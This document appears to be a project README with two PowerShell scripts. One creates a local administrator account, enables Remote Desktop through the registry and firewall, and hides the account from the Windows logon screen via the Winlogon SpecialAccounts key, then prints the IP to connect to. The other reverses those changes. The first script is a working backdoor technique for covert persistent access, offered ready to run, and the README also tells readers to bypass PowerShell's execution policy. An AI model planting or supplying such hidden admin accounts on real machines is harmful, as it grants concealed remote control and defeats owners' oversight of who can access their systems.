Script to create hidden user(s) to connect via remote desktop (local admin)

README.md

How to run this script?

In order to run this script, make sure you execute following command before:

Set-ExecutionPolicy Bypass -Scope Process -Force

It makes that you be able to run any script during current powershell session. If you close the powershell window you'll have to invoke this command again.

Then you can finally run: .\HiddenAccounts.ps1

Alternatively : .\HiddenAccountsRemover.ps1

Good to know

• Scripts does not verify correctness of password & username - even length isn't checked.
• Be sure you aren't overwriting one of the Microsoft account - inputted name can't be the same as M$ is!

How does it looks like?

HiddenAccount.ps1

function Test-IsAdmin {
([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
}

if(!(Test-IsAdmin)){
    Write-Warning "Try again, run with administrator privileges."
    Exit
}

$Username = Read-Host -Prompt "Enter username"
$Password = Read-Host -AsSecureString -Prompt "Enter password" # TODO: Minimal require length!
$Lang = Get-WinSystemLocale | Foreach {($_ -split '\s+',4)[0..2]}

$DefaultPath = Get-Location

function GenMsg(){
    Param (
        [Parameter(Mandatory=$true)][string]$msg,
        [Parameter(Mandatory=$false)][bool]$warning,
        [Parameter(Mandatory=$false)][bool]$indent = $False
    )

    if($indent){
        Write-Host "   " -NoNewline
    }
    Write-Host "- [" -NoNewline
    if($warning){
        Write-Host "X" -ForegroundColor Red -NoNewline
    } else {
        Write-Host "X" -ForegroundColor Green -NoNewline
    }
    Write-Host "] " -NoNewline
    Write-Host $msg
}

Write-Host "`nScript is running:"

# Create user
$Users = Get-LocalUser | Where-Object {$_.Name -eq $Username}
if (-not $Users){
    New-LocalUser $Username -Password $Password -FullName "Anonymous" -Description "Lorem Ipsum" | out-null
    GenMsg "Create new user"
} else {
    GenMsg "User with following name already exist" $True
}

# Add to group
$GroupName = If ($Lang -eq 'pl-PL') {"Administratorzy"} Else {"Administrators"}
$UserInGroup = (Get-LocalGroupMember -Group $GroupName | Where-Object { $_.PrincipalSource -eq "Local" } | Where-Object { $_.Name -eq "$($env:computername)\$($Username)" }).Count

if($UserInGroup -eq 0){
    Add-LocalGroupMember -Group $GroupName -Member $Username
    GenMsg "Add user to local administrators group"
} else {
    GenMsg "User exist in local administrators group" $True
}


# Allow to remote connections
$AllowRemote = (Get-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections").fDenyTSConnections
if($AllowRemote -eq 1){
    Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-Name "fDenyTSConnections" -Value 0
    GenMsg "Allow to remote connections"
} else {
    GenMsg "Allow to remote connections" $True
}

$NetworkGroupName = If ($Lang -eq 'pl-PL') {"Pulpit Zdalny"} Else {"Remote Desktop"}
$FirewallConfig = (Get-NetFirewallRule -DisplayGroup $NetworkGroupName).Enabled

if($FirewallConfig -notcontains $True){
    Enable-NetFirewallRule -DisplayGroup $NetworkGroupName
    GenMsg "Modify firewall configuration"
} else {
    GenMsg "Modify firewall configuration" $True
}

# Make user hidden
Set-Location -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
GenMsg "Edit registry"

if(Test-Path SpecialAccounts){
    GenMsg "- [SpecialAccounts] key already exist" $True $True
} else {
    New-Item –Name SpecialAccounts | out-null
    GenMsg "- [SpecialAccounts] key created successfully" $False $True
}

Set-Location -Path ".\SpecialAccounts"

if(Test-Path UserList){
    GenMsg "- [UserList] sub-key already exist" $True $True
} else {
    New-Item –Name UserList | out-null
    GenMsg "- [UserList] sub-key created successfully" $False $True
}

# You can't hide main account -REPAIR
if((Get-ItemProperty . -Name $Username -ErrorAction SilentlyContinue) -eq $null){
    New-ItemProperty -Path .\UserList -Name $Username -Value ”0” -PropertyType "DWord" | out-null
    GenMsg "- [$($Username)] Added property in sub-key" $False $True
} else {
    GenMsg "- [$($Username)] Entry was created before" $True $True
}

$IPAddress = (Get-NetIPAddress -AddressFamily IPv4).IPAddress[0]
$Message = @"

######
## CONNECT WITH $($IPAddress)
######

"@

Write-Host $Message
Set-Location -Path $DefaultPath

HiddenAccountRemover.ps1

function Test-IsAdmin {
([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
}

if(!(Test-IsAdmin)){
    Write-Warning "Try again, run with administrator privileges."
    Exit
}

$Username = Read-Host -Prompt "Input the username"
$Lang = Get-WinSystemLocale | Foreach {($_ -split '\s+',4)[0..2]}

$LastStage = $False
$DefaultPath = Get-Location

function GenMsg(){
    Param (
        [Parameter(Mandatory=$true)][string]$msg,
        [Parameter(Mandatory=$false)][bool]$warning,
        [Parameter(Mandatory=$false)][bool]$indent = $False
    )

    if($indent){
        Write-Host "   " -NoNewline
    }
    Write-Host "- [" -NoNewline
    if($warning){
        Write-Host "X" -ForegroundColor Red -NoNewline
    } else {
        Write-Host "X" -ForegroundColor Green -NoNewline
    }
    Write-Host "] " -NoNewline
    Write-Host $msg
}

Write-Host "`nScript is running:"

# Check if following user exist
$User = Get-LocalUser | Where-Object { $_.PrincipalSource -eq "Local" } | Where-Object {$_.Name -eq $Username}
if ($User -ne $null){
    Remove-LocalUser $User | Out-Null
    GenMsg "User $($Username) was deleted."
} else {
    GenMsg "Following user doesn't exist or username is incorrect" $True
}

# Info block
GenMsg "Omit removing from local administrators group"

# Undo hide user
Set-Location -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
GenMsg "Edit registry"

#$tmp = Get-ItemProperty -Path .\SpecialAccounts\UserList -Name $Username -ErrorAction SilentlyContinue
#Write-Host $tmp

if((Get-ItemProperty -Path .\SpecialAccounts\UserList -Name $Username -ErrorAction SilentlyContinue) -ne $null){
    
    Remove-ItemProperty -Path .\SpecialAccounts\UserList -Name $Username
    GenMsg "- [$($Username)] entry removed successfully" $False $True
    
} else {
    GenMsg "- [$($Username)] entry was not found" $True $True
}

# Empty? Remove 
if((Get-Item .\SpecialAccounts\UserList).Property.Count -eq 0){
    Remove-Item -Path .\SpecialAccounts -Recurse
    GenMsg "- [UserList] sub-key was removed" $False $True
    GenMsg "- [SpecialAccounts] key was removed" $False $True
    $LastStage = $True
} else {
    GenMsg "- [UserList] sub-key still exist" $True $True
    GenMsg "- [SpecialAccounts] key still exist" $True $True
}

# Clean up everything
if($LastStage){

    # Disallow to remote connections
    Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 1 | Out-Null
    GenMsg "Disallow to remote connections"

    # Revert firewall configuration
    if($Lang -eq 'pl-PL'){
        Disable-NetFirewallRule -DisplayGroup "Pulpit Zdalny"
    } else {
        Disable-NetFirewallRule -DisplayGroup "Remote Desktop"
    }
    GenMsg "Revert firewall configuration"
} else {
    GenMsg "Disallow to remote connections" $True
    GenMsg "Revert firewall configuration" $True
}

$Message = @"

######################
#### USER REMOVED ####
######################

"@

Write-Host $Message
Set-Location -Path $DefaultPath